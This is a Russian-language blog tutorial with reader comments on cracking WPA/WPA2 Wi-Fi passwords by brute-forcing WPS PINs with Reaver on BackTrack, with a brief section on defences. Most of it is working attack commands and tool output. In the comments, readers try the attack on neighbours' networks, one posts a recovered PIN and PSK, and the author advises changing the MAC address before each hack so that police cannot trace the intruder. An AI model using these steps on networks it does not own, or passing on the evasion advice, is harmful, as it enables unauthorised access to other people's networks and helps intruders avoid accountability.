|
Твитнуть |
Всем привет!
Из-за того, что все движется и не стоит на месте, решил сказать вам кое какую обновленную информацию. Один из разделов в этой статье говорит о том, как устанавливать reaver на BackTrack 5 R1 и где скачивать сам BackTrack 5 R1. Так вот ничего устанавливать теперь не нужно! Потому что вышел BackTrack 5 R2, в котором reaver уже установлен.
Скачать BackTrack 5 R2 вы можете здесь.
Вот и все касаемо обновления. Приятного чтения!
Wi-Fi сеть является удобным беспроводным шлюзом в Интернет и Вы не заинтересованы в его использовании любым хулиганом, который проходит мимо дома, а поэтому защищаете сеть с помощью пароля, не так ли?
Зная, как легко можно взломать WEP-пароль, Вы, вероятно, обеспечите безопасность сети с помощью более пуленепробиваемого WPA-протокола безопасности.
Но вот и плохие новости: новый, бесплатный, с открытым исходным кодом инструмент под названием Reaver использует дыру в безопасности беспроводных маршрутизаторов и может относительно легко взламывать текущие пароли большинства маршрутизаторов.
Рассмотрим пошагово, как с помощью Reaver взломать пароль WPA или WPA2 и как защитить собственные сети от атак Reaver.
В первом разделе статьи автор будет идти по ступенькам, необходимым для взлома паролей WPA с использованием Reaver. Вы можете следовать за текстом ниже. После этого автор объясняет, как работает Reaver, и что Вы можете сделать, чтобы защитить свою сеть от атак Reaver.
Во-первых, краткое замечание, которое мы часто напоминаем читателям, когда обсуждаем темы, которые являются потенциально опасными. Знание – это сила, но сила не означает, что Вы должны что-то сломать, или делать что-то незаконное. Знание, как взломать замок, не делают Вас вором. Рассматриваем данную статью как образовательную или доказательство правильности концепции интеллектуального права. Чем больше Вы знаете, тем лучше сможете защитить себя.
Что Вам нужно
Вам не нужно быть администратором сети, чтобы воспользоваться Reaver и инструментами командной строки, которые делают тяжелую работу, и если Вы имеете чистый DVD, компьютер с картой Wi-Fi и несколько свободных часов, то у Вас есть практически все, что нужно. Есть целый ряд способов, с помощью которых Вы могли бы установить Reaver, но есть конкретные требования данного руководства:
BackTrack 5 Live DVD. BackTrack представляет собой загрузочный дистрибутив, который наполнен до краев инструментами тестирования сети, но, хотя это не строго обязательно для использования Reaver, это самый простой подход для большинства пользователей. Скачайте Live DVD со страницы загрузки BackTrack и запишите его на DVD. Вы можете также загрузить образ виртуальной машины, если используете VMware, но если Вы не знаете, что такое VMware, просто остановитесь на Live DVD. Показанное выше означает, что Вы должны выбрать BackTrack 5 R1 в списке выпусков, выбрать Gnome, 32 – или 64-битный, в зависимости от Вашего процессора (если не знаете, какой у Вас, то безопаснее выбрать 32), ISO для образа, а затем загрузить ISO.- Компьютер с Wi-Fi и привод DVD. BackTrack работает с беспроводной картой на большинстве ноутбуков, поэтому вероятно, что ноутбук будет работать нормально. Тем не менее, BackTrack имеет не полный список совместимости, а поэтому никаких гарантий. Вам также понадобится дисковод DVD, поскольку из него Вы будете загружаться в BackTrack.
- Размещена недалеко Wi-Fi сеть с WPA-защитой. Технически, это должна быть сеть с использованием WPA-защиты и включенная WPS. Автор объясняет подробнее в разделе “Как работает Reaver”, как WPS создает брешь в системе безопасности, что делает возможным взлом WPA.
- Немного терпения. Это 4-х ступенчатый процесс и хотя не очень сложно взломать пароль WPA с Reaver, но это атака грубой силы, которая означает, что Ваш компьютер будет проверять много разных комбинаций для взлома маршрутизатора, прежде чем найдет правильную. Когда тестировал автор, то Reaver понадобилось около 2,5 часов, чтобы успешно взломать пароль. Домашняя страница Reaver предполагает, что это может занять 4-10 часов. Ваша оценка может измениться.
Давайте взламывать!
В этот момент Вы уже должны иметь записанный DVD с BackTrack и свой ноутбук под рукой.
Шаг 1: Загрузка BackTrack
Чтобы загрузиться с BackTrack, просто вставьте DVD в дисковод и загрузите машину с диска. (Используйте Google, если вы ничего не знаете о дисках Live CD/DVD и Вам нужна помощь в этой части.) Во время процесса загрузки BackTrack Вам будет предложено выбрать режим загрузки. Выберите “BackTrack Text – Default Boot Text Mode” и нажмите Enter.
Наконец, BackTrack загружается в командной строке. Когда Вы увидите в строке курсор, введите команду startx и нажмите Enter. BackTrack будет загружен в своем графическом интерфейсе.
Шаг 2: Установка Reaver
В командной строке введите:
apt-get update
Затем, после завершения обновления:
apt-get install reaver
Если все прошло хорошо, то теперь Reaver должен быть установлен. Это может казаться немного хромым, но Вам было необходимо подключение к сети, чтобы установить Reaver, но теперь он будет оставаться установленным, пока Вы не перезагрузите компьютер.
Шаг 3: Соберите информацию об устройстве, подготовьте Ваш взлом
Для того, чтобы использовать Reaver, Вам необходимо получить имя интерфейса беспроводной карты, BSSID маршрутизатора, который Вы пытаетесь сломать (BSSID – это уникальная последовательность букв и цифр, который идентифицирует маршрутизатор), и Вы должны убедиться, что Ваша карта беспроводной сети находится в режиме мониторинга. Давайте все это сделаем.
Найдите Вашу беспроводную карту: Внутри Terminal, введите:
iwconfig
Нажмите клавишу Enter. Вы должны увидеть мобильное устройство в дальнейшем список. Скорее всего, это будет имя wlan0, но если у Вас есть несколько беспроводных карт или необычные сетевые настройки, то название может быть другое.
Переведите Вашу беспроводную карту в режим мониторинга: Предположим, что имя интерфейса Вашей беспроводной карты есть wlan0, тогда выполните следующую команду, чтобы перевести беспроводную карту в режим мониторинга:
airmon-ng start wlan0
Эта команда выведет имя интерфейса режима мониторинга, которое Вы также должны знать. Скорее всего, это будет mon0, как показано на рисунке ниже. Обратите на это внимание.
Найдите BSSID маршрутизатора, который Вы хотите взломать: Наконец, Вам необходимо получить уникальный идентификатор маршрутизатора, который Вы пытаетесь взломать, чтобы Вы могли указать Reaver правильное направление. Для этого выполните следующую команду:
airodump-ng mon0
Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже:
Когда увидите необходимую сеть – нажмите Ctrl + C, чтобы остановить обновление списка и скопируйте BSSID данной сети (это последовательность букв, цифр и двоеточий в крайнем левом столбце). Сеть должны иметь WPA или WPA2, перечисленные в колонке ENC. (Если это WEP, то используйте предыдущее руководство по взлому WEP паролей).
Теперь, с BSSID и именем интерфейса монитора в руках у Вас есть все необходимое для запуска Reaver.
Шаг 4: Crack пароля WPA-сети с помощью Reaver
Теперь выполните следующую команду в терминале, заменив BSSID и moninterface интерфейсом BSSID и монитором, которые скопированы выше:
reaver -i mon0 -b bssid -vv
Например, если Ваш интерфейс монитора mon0, как у автора, и Ваш BSSID 8D:AE:9D:65:1F:B2 (BSSID автор выдумал), то Ваша команда будет выглядеть так:
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
Нажмите клавишу Enter и сидите, сложа руки, а Reaver пусть выполняет свою работу тревожной магии. Reaver теперь будет пытаться посылать серии PIN-кодов на маршрутизатор с перебором всех вариантов, один за другим. Это займет некоторое время. В успешном испытании автора Reaver потратил 2 часа 30 минут, чтобы взломать сеть и выдать автору правильный пароль. Как упоминалось выше, документация Reaver утверждает, что это может занять от 4 до 10 часов, поэтому на это уйдет больше или меньше времени, чем у автора. Когда Reaver завершит взлом, то это будет выглядеть следующим образом:
Несколько важных факторов, для рассмотрения: Reaver работал именно так, как рекламируется, в тесте автора, но это не обязательно будет работать на всех маршрутизаторах (см. подробнее ниже). Кроме того, для крекинга Ваш маршрутизатор должен иметь относительно сильный сигнал, так что, если Вы не в зоне уверенной работы маршрутизатора, то, вероятно, возникнут проблемы и Reaver может не работать. В течение всего процесса Reaver иногда делает тайм-аут, иногда зацикливается, проверяя PIN-код повторно, и так далее. Автор просто позволил программе продолжать работать, и все это было близко к маршрутизатору, и в конце концов он выполнил свою работу до конца.
Также следует отметить, что Вы можете также остановить свое продвижение в любой момент, нажав Ctrl + C при работе Reaver. Это позволит выйти из процесса, но Reaver сохраняет любой прогресс, так что в следующий раз, когда выполните команду, Вы можете подобрать, где остановились, до тех пор, пока Вы не выключите компьютер (который, если Вы работаете с Live DVD, будет полностью сброшен (reset).
Как работает Reaver
Теперь, когда Вы увидели, как использовать Reaver, давайте сделаем краткий обзор того, что делает Reaver. Инструмент использует уязвимость под названием Wi-Fi Protected Setup, или WPS. Это функция, которая существует на многих маршрутизаторах, предназначенная для обеспечения простого процесса установки и жестко связана с PIN устройства. Reaver эксплуатирует недостаток в этих PIN-кодах: результатом является то, что за достаточное время, он может раскрыть свой WPA-или WPA2-пароль.
Читайте подробности об уязвимости в замечательном посте Шон Галлахер на Ars Technica.
Как защитить себя от атак Reaver
Поскольку уязвимость заключается в реализации WPS, то Ваша сеть должна быть безопасной, если можно просто выключить WPS (или, еще лучше, если Ваш маршрутизатор не поддерживает WPS). К сожалению, как на это указывает Галлахер на Ars, даже с вручную выключенным WPS через настройки своего маршрутизатора, Reaver был еще в состоянии сломать его пароль.
В телефонном разговоре, Крейг Хеффнер заявил, что неспособность закрыть эту уязвимость широко распространена. Он и другие нашли, что это происходит с каждыми Linksys и Cisco Valet беспроводными точками доступа, которые они тестировали. “На всех маршрутизаторах Linksys, вы не можете вручную отключить WPS”, сказал он. В то время как веб-интерфейс имеет переключатель, который якобы отключает конфигурацию WPS “, но они и дальше, по-прежнему уязвимы.
Так что, вроде, облом. Вы может все еще хотите попробовать отключить WPS на маршрутизаторе, если есть такая функция, и проверить его через Reaver, чтобы увидеть помогает ли это?
Кроме того, можно настроить фильтрацию MAC-адреса маршрутизатора (который позволяет только специальный белый список устройств для подключения к сети), но даже не очень опытные хакеры смогут обнаружить МАС-адрес из белого списка устройств и использовать спуфинг с MAC-адресом «белого» компьютера.
Двойной облом. Так что же будет работать?
У автора ??на маршрутизаторе установлена прошивка DD-WRT с открытым исходным кодом и она не позволила взломать пароль, используя Reaver. Как оказалось, DD-WRT не поддерживает WPS, так что есть еще одна причина сторонникам полюбить бесплатный маршрутизатор. Если Вы заинтересовались DD-WRT, проверьте список поддерживаемых им устройств, чтобы увидеть, поддерживается ли Ваш маршрутизатор. Это хорошее обновление безопасности, и DD-WRT может также делать другие классные вещи такие, как мониторить использование Интернета, создать сетевой жесткий диск, задействовать для всего дома блокировку рекламы, увеличить радиус действия Wi-Fi сети и многое другое. Это существенно поможет Вам превратить маршрутизатор за $60 в маршрутизатор за $600.
Дополнительная литература
Благодаря этому сообщению с Mauris Tech Blog мы получили очень простую отправную точку для использования Reaver. Если Вы заинтересованы в чтении больше, смотрите:
- Руководство на Ars Technia
- Linux-ориентированный гид от Null Byte
- Страница Reaver-продукта (он также доступен как дружеская коммерческая версия).
Пользователь Reddit Jagermo (которого автор кратко упоминал при исследовании Reaver) создал общественный spreadsheat, пытаясь построить список уязвимых устройств. Таким образом, Вы можете проверить склонен ли Ваш маршрутизатор взламываться посредством Reaver.
Чтобы следить за статьями блога, оформляйте подписку по E-MAIL или RSS.
Источник: www.isearch.kiev.ua
Дополнительные материалы:
- Как с помощью DD-WRT дополнить возможности беспроводного маршрутизатора функционалом Linux
- Reaver FAQ. Советы и рекомендации по использованию Reaver
- Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 2
- Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 1
- Как узнать SSID скрытой точки доступа без клиентов
- Medusa. Как взломать пароль от Wi-Fi роутера
- Как узнать SSID скрытой точки доступа
- Как установить reaver в BackTrack 5 R1
- Reaver. Взлом Wi-Fi сети
- Установка Wi-Fi драйвера на Debian
- Взлом Wi-Fi сети (WEP) – часть 4
- Взлом Wi-Fi сети (WEP) – часть 3
- Взлом Wi-Fi сети (WEP) – часть 2
- Взлом Wi-Fi сети (WEP) – часть 1
- Введение в беспроводные сети
Comments
Перед этой строчкой “Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже” вместо “wlan0″ нужно написать “mon0″. Я сутки не мог понять, почему я дальше не могу продвинуться.
да правильно, что то не заметил, когда вставлял. сейчас все исправлено.
Это все отлично, на как быть, если нет доступа к инету для установки Reaver
эээ, что? ваш вопрос мне не понятен.
Утверждение о том, что “Reaver уже добавлен в последнюю версию BackTrack” не выдерживает критики. Нету там Reaver, хоть пукни. Приходится устанавливать.
Но, за статью большой респект!!!
у меня єсть wep но к ней никак подключитса нельзя да идругова адаптера(карти) не видит realink 3070 до reavera дошел до установки а дальше никак может чтота делаю ни так подскажите пожалуста…
вы не могли бы поделить на предложения ваш комментарий, а то, что то мне ничего не понятно.
hub-lex ща постараюсь описать по подробниє. Загрузил диска и когда уже дашол штоб загрузить reaver, подключаюсь до сети, у меня есть wep на какой я сижу, чтоби подключитса вважу паролю пишет bed password ,когда нажимаю coneect.С адаптером уже разабралса все идьот харашо.
вы хотите с помощью reaver подключиться к точке доступа с шифрованием WEP?
reaver нужен для взлома pin-кода. так же на роутере должен работать WPS, без него ничего не получится и шифромание WPA/WPA2. чтобы проверить работает ли WPS, необходимо воспользоваться walsh:
walsh -i mon0
по взлому WEP, читайте статьи:
Взлом Wi-Fi сети – часть 1
Взлом Wi-Fi сети – часть 2
Взлом Wi-Fi сети – часть 3
Взлом Wi-Fi сети – часть 4
Чтобы установить Reaver, сначала необходимо подключиться к Wi-Fi сети, для которой у Вас есть пароль. Ета с шага 2 скопировал я немогу подключитса к сети штоб загрузитьReaver….
в статье были неточности, которые исправлены.
для установки reaver вам нужно быть подкл. к Интернет. просто вставьте LAN или что вы используйте.
потом команды установки. далее действуйте по шагам.
если у вас будут дополнительные вопросы, можете связаться со мной по skype’y: hub-lex-21
Статья пупер! :smile:
Вот, еще бы по установку walsh в BT5r1GNOME и как его юзать?
walsh устанавливается вместе с reaver. в установке нет ничего сложного:
1. скачивайте reaver с офф-сайта (http://code.google.com/p/reaver-wps/downloads/list)
2. читаете файл README (секция Install)
3. делайте шаги из секции Install. вот и все. но может быть такое, что придется доустановить еще некоторые библиотеки.
p.s.: если наберется 10 комментариев о том, что установка reaver не понятна, тогда буду делать статью по этопу поводу.
BT5r1GNOME стоит второй системой и все равно walsh не могу установить. Все красиво: установил Reaver 1.4 – работает, и walsh установил вроде…, и скомпилил билд из SVN вот так:
# svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
# cd reaver-wps-read-only/src
# ./configure
# make
# make install
А все равно пишет “walsh: command not found”, пичалька однако. Проблема с драйвером? Но команда, то должна быть?
walsh была в сборке reaver v1.3 (не знаю почему так)
посмотрите не walsh, а wash. должна находиться в /usr/local/bin
Мля! ВОТ, подиж догадайся. Конечно же “WASH”, а не walsh. Все копытит, большое ВАМ спасибо! :mrgreen:
Без проблем! Рад был помочь.
Будут вопросы обращайтесь.
Andrey – wash -i mon0
Спасибо за статью. Лучшая на сегодня.
Поясню свой вопрос по Reaver
————–
rex 26 Январь 2012 в 14:55
Это все отлично, на как быть, если нет доступа к инету для установки Reaver
—————–
Запуск reaver при загрузке с Live-cd подразумевает зависимость от уже имеющегося подключения к интернету.
Ваша цитата:
____
Если все прошло хорошо, то теперь Reaver должен быть установлен. Это может казаться немного хромым, но Вам было необходимо подключение к сети, чтобы установить Reaver, но теперь он будет оставаться установленным, пока Вы не перезагрузите компьютер.
______
А в ситуации в чистом поле, когда подключиться к инету для активации reaver нет? Уже как-то “не Айс” :)Или я что-то не понял?
сейчас скачиваю backtrack 5 r1, чтобы проверить есть ли reaver в нем. но скорее всего его не будет. поэтому придется reaver устанавливать.
что касается ситуации в чистом поле, то могу предложить установить backtrack второй системой (так многие делают)… или установить reaver и aircrack-ng в вашу рабочую систему, у меня это Debian.
так же не обходим стороной статью “Reaver. Взлом Wi-Fi сети“
как и предполагалось reaver не установлен. так что придется устанавливать:
# apt-get update
# apt-get install reaver
p.s.: когда я собирал reaver 1.3, вместо wash была walsh, теперь вроде все впорядке.
Вопрос, м.б. не в тему, сорру: При загрузке ВТ5 с Live-Cd все отлично работает, но при установке ВТ в виртуальную машину – система не видит wi-fi адаптер. Может такое быть или надо лечить руки? (Комп у меня старенький)
usb wi-fi адаптер?
vm vare например не видит плату wi-fi, это описано в руководстве.
Установка Reaver в BT : http://sh0aib.blogspot.com/2012/01/updateinstall-reaver-in-backtrack.html
Господа, подскажите,плз, что значит данная надпись после запуска Rever:
#reaver -i mon0 -b XX:XX:XX:xx:xx:xx -vv
! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA)
! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA) ну и т.д
несколько вопросов:
1. вы точно уверены, что AP поддерживает WPS? чтобы проверить, воспользуйтесь командой wash:
wash -i mon0 --scan2. на каком расстоянии находитесь от AP?
Как оказалось, сообщение “! WARNING : Fiаled to associate with XX:XX:XX:xx:xx:xx (ESSID: VASIA)” обозначает фильтрацию точки по МАС-адресу, но вот как эту проблему обойти в Reaver, я что-то пока не понимаю…
если происходит фильтрация по MAC, то вам нужно воспользоваться программой macchanger. если у вас возникнут с этим тружности, можете позвонить мне в скайп: hub-lex-21
у меня та же проблема но команды wash не существует есть wlash но при наборе такой команды там ниче нет. только прочерки. это означает что взламать невозможно??значит не поддерживает???
Покажите, что вы вводите. Постарайтесь дать ответ более детально.
набираю команду в программе wifiway walsh -i mon0 нажимаю ентер и появляеться BSSID Channel RSSI WPS Version WPS Locked ESSID
————————————————————————————————————— и больше ничего. это означает что длинк не поддерживает впс???т.е. взломать никак?? и при реавере долго висит надпись о ассоциации и ничего не происходит. что делать???
Значит у на AP не работает WPS.
А reaver так и будет подключаться. Еще раз повторяю ВСЕМ! Сначала проверяйте wash, а только потом включайте reaver.
после черточек пишет found packet with bad FCS. skiping… типа того
скажи плиз !!!
reaver вшит в образ BT5R1-GNOME-32.iso ????
если нет – то дай подробную инструкцию для интегрирования!!!!!
неделю назад скачивал BT5R1-KDE-32.iso, reaver там не было.
чтобы установить reaver делайте следующее:
1. apt-get update
2. apt-get install reaver
если так не поможет, то устанавливайте из исходников http://code.google.com/p/reaver-wps/
если у вас возникнут трудности с этим, то можете связаться со мной по skype: hub-lex-21
вы можете так же посмотреть статью “Установка reaver в BackTrack 5 R1“
Спасибо автору за статью.Решил попробовать применить.Reaver пыхтел долго и не спеша,примерно 1% за 25 мин.Общее время на взлом составило около 42 час,и пароль из 10 цифр и букв был найден. :grin:
что то много… а на каком раccтоянии вы находились от AP?
Расстояния я не знаю,но ноутбук по значку интернета показывает,что сигнал “отличный”.
Расстояние это главный фактор в этом деле, но если у вас сигнал отличный, то наверное здесь, что то другое. В любом случае у вас получилось и это хорошо.
Все прочитал все включилось обновил reaver но не идет пишет 0.00% complete . всю ночь работал также 0. может правда далековато ??? показывает сигнал 2-3 деления . Вроде все разжевал толково hub-lex а положить в рот ни как не получается – обидно как-то . Пишет так : Warning:Receive timeout occurred -Sending:eapol start request Trying pin 12345670 Sending WSC NASK Warning: 25 successive start failures
Если вы только начинаете осваивать это дело, советую вам поэкспериментировать на своей AP.
Я хотел бы побольше повозиться с BackTrack,но не знаю, как его загрузить в виде одного файла на диск D,а в загрузочной записи были бы только три варианта:Windows 7,Ubuntu,BackTrack.В противном случае мои внуки голову сломают.
А если установить BackTrack 5 на виртуальную машину? Или сделать Life USB?
Так же вы можете зайти на сайт BackTrack в раздел “HOW TO“. Там много чего написано про то, что можно сделать с дистрибутивом.
Желаю удачи! Будут вопросы обращайтесь.
У меня следущая проблема : всё запустил, поставил reaver, решил просканировать пишу wash – imon0 –с пишет следущее – (Found packet with bad FCS, skipping), Windows показывае,т что защита на маршрутизаторе WPA-PSK, ок загрузил опять BACK TRACK, выполнил все необходимые операции дал команду #reaver -imon0 –b 02:02:CF:5А….. пишет [+] Waiting for beacom from 02:02:CF …..
и всё… оставил комп на ночь ничего не изменилось, нажал Ctrl+C – [+] Nothing done, nothing to save. Я что то делаю не так ? или руки не от туда у меня ? или пробл?ма в точке доступа? (сигнал стабил?ый – 35% ) Заранее балгодарю за ответ !
Вы точно уверены, что на AP есть WPS? Во многих (почти всех) документах говориться о том, что необходимо как минимум хороший сигнал.
Попробуйте для начала “поиграть” с опциями reaver’a. Посмотрите раздел “USAGE” тут.
p.s.: aппаратная часть некоторых AP не очень хорошая: кэш, объемом памяти.
hub-lex, спасибо большое за подробный и очень интересный материал.
Хотелось бы узнать о безопасности взломщика.
могут ли его идентифицировать при попытке(успешной или нет) взлома?
Как защититься? и какие могут быть последствия, если, скажем, попытаться сломать WiFi соседей?
Спасибо
Большое спасибо!
Главная угроза взломщика в этом деле – WIDS (Wireless Intrusion Detection Systems) Системы Обнаружения Беспроводных Атак, о которых можно почитать в Сети. Они устанавливаются в банках и крупных компаниях, которым есть что терять при взломе и которые заботятся о своей безопасности. Но WIDS могут быть так же не эффективны, если у взломщика есть узконаправленная антенна с коэффициентом усиления 15-25 dbi.
Домашним пользователям это не нужно поэтому здесь все гораздо проще. Единственное, о чем необходимо заботиться, так это о вашем MAC-адресе (про WIDS это тоже касается). Как известно они уникальны. И поверьте, что выйти силовым структурам на человека по этому адресу не представляет особой трудности! Поэтому перед каждым взломом пользуйтесь такой программой, как macchanger. Информацию о программе можно найти тут.
такой вопрос
у меня дошло до 20% и все застыло на этом этапе
switching mon0 to channel 2
switching mon0 to channel 3
switching mon0 to channel 4
——-по порядку———-
switching mon0 to channel 14
что это означает? стоит ли ждать?
пробовал перезапускать таже история.
покажите какие команды вы использовали.
и на всякий случай воспользуйтесь вот этим:
http://www.google.ru/#sclient=psy-ab&hl=ru&newwindow=1&source=hp&q=switching+mon0+to+channel+2+site:code.google.com%2Fp%2Freaver-wps%2F&pbx=1&oq=switching+mon0+to+channel+2+site:code.google.com%2Fp%2Freaver-wps%2F&aq=f&aqi=&aql=&gs_sm=3&gs_upl=313053l322731l1l323153l16l15l1l0l0l0l142l1474l11.4l16l0&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=ffef18fc8074519e&biw=1280&bih=605
после паузы
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv
пошло изминение значений до:
switching mon0 to channel 14
и ступор.
Svit, вам правильно подсказывает zero…
вы не указали канал на котором работеат AP.
а у меня такой вопрос
пришлось остановить и после запустить.
значения постоянно меняются,но проценты не
растут (остаются прежними которые набрались
до перезапуска)
попробуйте подождать или сделайте все сначала. иногда такое случается…
и не забывайте про то другие опции reaver’a! попробуйте поэкспериментировать. и не забывайте заходить на официальные сайты программ!
по поводу опций и эксперимента, почитайте вот это: http://code.google.com/p/reaver-wps/wiki/README
да. пиши так reaver -i mon0 -b xx:xx:xx:xx:xx:xx -с 6 -vv
встановив BackTrack другой операционной системой а щас пишет призагрузке BackTrack 5 R1-code name revolution 32bitbt tty1
bt login
password
что ввадить подскажи пожалуста hub-lex
Что то не могу понять. Система предлагает ввести вам логин и пароль? Если так, то:
login: root
pass: toor
запустить Х’ы: startx
если вы имели, что то другое, тогда напишите по шагам, что вы делали и что вам нужно.
на cd у меня єсть BackTrack зашол с него загрузилса Патом внутри него єсть install BackTrack зашел в него
і решил встановить на компа но в конце загрузки пишет:
BackTrack 5 R1-code name revolution 32bitbt tty1
вважу логин login: root но пороль не магу ввести
password не вводитса кагда жму enter
login incorrect
В *NIX ОС, когда вводите пароль его не видно. Это сделано специально, чтобы никто не смог посмотреть, какой длины пароль.
В BackTrack логин = root; пароль = toor.
в обшем когда встановил BackTrack. При загрузке
операнионной системи спрашивает login и password
ЛОГИН ROOT ПАСС TOOR ЕСЛИ БУВЫ НЕ БУДУТ ПИЧАТАТСЯ ЭТО НОРМАЛЬНО .
hub-lex спасиба все нормально
логин = root; пароль = toor. подошли. Извини что отнял у тебя время.СПС
Ничего страшного, главное что проблема решена. Будут вопросы обращайтесь.
У меня такая проблема reaver на 94% выдал cracked и pin 13984142 psk 2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16
этот пароль не пошел конечно на соседский wi-fi кто с таким сталкивался? и что нужно делать дальше при таком раскладе? запустил дальше и ничего дошел до 99,9% потом все выдает warning, у кого такое было?
Привидите скриншот пожалуйста или сообщение об ошибке, а то от слова warning толку мало =)
у меня такая же ерунда… что делать ???? помогите =(
скриншот увы уже упустил сделать но выдает такое WARNING: Receive timeout occurred
ну я уже надыбал инфу по этой ошибке, все понял но вот не нашел насчет psk:2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16
если он такое выдает по завершению своей работы то кажись неверно работает reaver, и неверный пароль идет , может пароль среди этих цифр :)))
использую backtrack 5r1 gnome reaver 1.4
что можете сказать насчет cracked psk из 64 символов приведенных мной выше ?
Посмотрите на последний листиг вот этой статьи: http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
…красным цветом выделен пароль. У вас так же? Если да, то это и есть пароль, который вы ищите. Если это не то, тогда можете позвонить мне в skype: hub-lex-21 …постараюсь помочь.
Достопочтенный, а можно “нарытую” инфу – в студию? Очень выручите.
какую “нарытую” инфу?
[+] WPS PIN: ’13984142′
[+] WPA PSK: ’2ce32506d91b96ff308527ed93ff327beadfc7e7cbf64706e161c3437a534b16′
[+] AP SSID: ‘Zyxel’
пробовал уже этот пароль, не пошел он на соседский wi-fi я, да и не думаю что сосед такой пароль бы сделал, попробую еще раз reaverom если не получиться или выдаст что то в этом роде , свяжусь с вами. спс за внимание.
Это странно, потому что это и есть пароль…попробуйте тогда еще раз.
Без проблем.
у меня такаяже ситуация два раза перезапускал,
каждый раз выдавало разный пароль
неподходящий к сети
почему!???
Доброго времени суток!
Возникла следующая проблема:при запуске reaver -i mon0 -b хх:хх:хх:хх:хх:хх -vv выдает следующее:
Associated with хх:хх:хх:хх:хх:хх (EESID: ketevani)
Trying pin 12345670
Sending EAPOL START request
Received indentity request
Sending identity response
И все дальше ничего.Прождал полчаса,без изменений. Помогите пожалуйста!
Посмотрите здесь: http://code.google.com/p/reaver-wps/issues/detail?id=215
…описывается похожая проблема. Там говорится, что может подкачать железо самой AP…попробуйте оставить все это дело на ночь, может что нибудь изменится.
hu b-lex подключаюсь к сети, ее викидивает из сети, слишал что срабативает защита такоє возможно?
Саму AP выкидывает? С таким кажется не сталкивался… Покажите, какие сообщения выдаются.
со второй попытки удалось получить желаемый результат за(34час)
решил поэксперементировать на других ESSID:
и вот новый вопрос-
в 1м случаи – WARNING: Failed to associate with 00:13:33:33:33:37 (ESSID: …
в 2м случаи – Аssociated with 00:11:22:33:44:55 (ESSID: …
прождал пару часов в обоих случаях-стоит без изменений,пробовал указать канал таже история
Почему одни ESSID пингуются а другие нет.
Поздравляю!
Вы так же должны следить за такими параметрами, как: уровень сигнала и проверять работает ли WPS на AP. Если вы будите находится далеко от AP (уровень сигнала средний/слабый) сорее всего у вас ничего не получится. Проверить, работает ли WPS на AP можно программой wash.
cамое интересное то что удачная попытка прошла на хорошем сигнале, а 2ве следующие на очень хорошем
никак.спасибо за внимание
wash -i mon0 –scan проверил и понял почему никого сламать не могу . :cry:
не поддерживается WPS?
может ктота знает другиэ програми спасиба автору.
да эсть сети но с очень слабим сигналом…
попробуйте поэкспериментировать на своей AP.
щас ломаю пасмотрим что вийдет…
зря видна ищо один комп купил.
Подскажите такая проблема
после ввода команды
reaver -i mon0 -b **:**:**:**:**:** -vv
пишет reaver: command not found
что я делаю неправильно?
у вас установлен reaver?
от какого пользователя идет запуск программы? попробуйте запустить reaver от имени root.
Reaver установлен. ну тоесть я его устанавливаю каждый раз, когда вставляю диск BackTrack 5 R1 и перезагружаю ноут, а так я все делаю как описано выше, и все получается до того момента когда ввожу
reaver -i mon0 -b **:**:**:**:**:** -vv
и нажимаю enter. запуск программы root@root
Как вы устанавливайте reaver?
Он у вас точно установлен?
Попробуйте запустить reaver без параметров, потому что если вы установили reaver, странно то, что выдается сообщение “reaver: command not found“.
Да действительно я не установил REAVER. Подскажите как это правильно сделать если интернет проводной. Скачал reaver-1.4.tar.gz что с ним дальше делать, читал статью “Установка reaver в BackTrack 5 R1″ чет не получается. Можно поподробние про установку Reaver. Зарание спасибо.
Можно, но если статья по установке reaver вам не помогла, тогда обращайтесь на прямую Skype: hub-lex-21
Всё сделал как в описано в статье, в результате:
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
вот такая надпись, 30 минут без изменений
посмотрел в соседней статье http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
вот этой строчке у автора нет:
[+] Switching mon0 to channel 1
может в ней проблема ?
Switching mon0 to channel 1
это значит, что интерфейс mon0 переключился на канал 1…в этом нет проблемы
30 минут без изменений
какой уровень сигнала до AP?
покажите команду, которую вводили…
Уровень сигнала до AP 100%, т.к. пробую на своей точки.
Пробовал команду wash-скан пишет:
Found packet with bad FCS, skipping
может AP не поддерживает WPS ? как это узнать
вообщем у меня в точности такая же проблема как и у:
sergej 14 Февраль 2012 в 14:57
Автору блога мега уважуха и большое спасибо, за отзывчивость, хоть у меня и ничего не получилось на своей точки из за не поддержки WPS, буду пробовать на соседских.
Автору спасибо.
У меня проблема, как прокоментируете?
Проблем с ВЕП нет. А вот ВПА и ВПА2 не поддаются, по причине:
root@root:~# reaver -i mon0 -b 14:D6:4D:83:9F:5A -vv
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 14:D6:4D:83:9F:5A
[+] Switching mon0 to channel 13
[!] WARNING: Failed to associate with 14:D6:4D:83:9F:5A (ESSID: KONAN)
на любой сети пишет на своей так же.
-менял бэктрек с 5 по поледний 5 Р2 – ноль
-менял реавер с 1 до ревизии – ноль
-пробывал на 2м ноуте – тоже ноль результата.
Я выше читал комент, но полезного от самого разраба реавера не нашел, пробовал все.
Покажите, что выдает команда wash -i mon0
Какой уровень сигнала?
root@bt:~# wash -i mon0Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
14:D6:4D:83:9F:5A 13 -37 1.0 No KONAN
^[[A14:D6:4D:83:9F:5A 13 -45 1.0 No KONAN
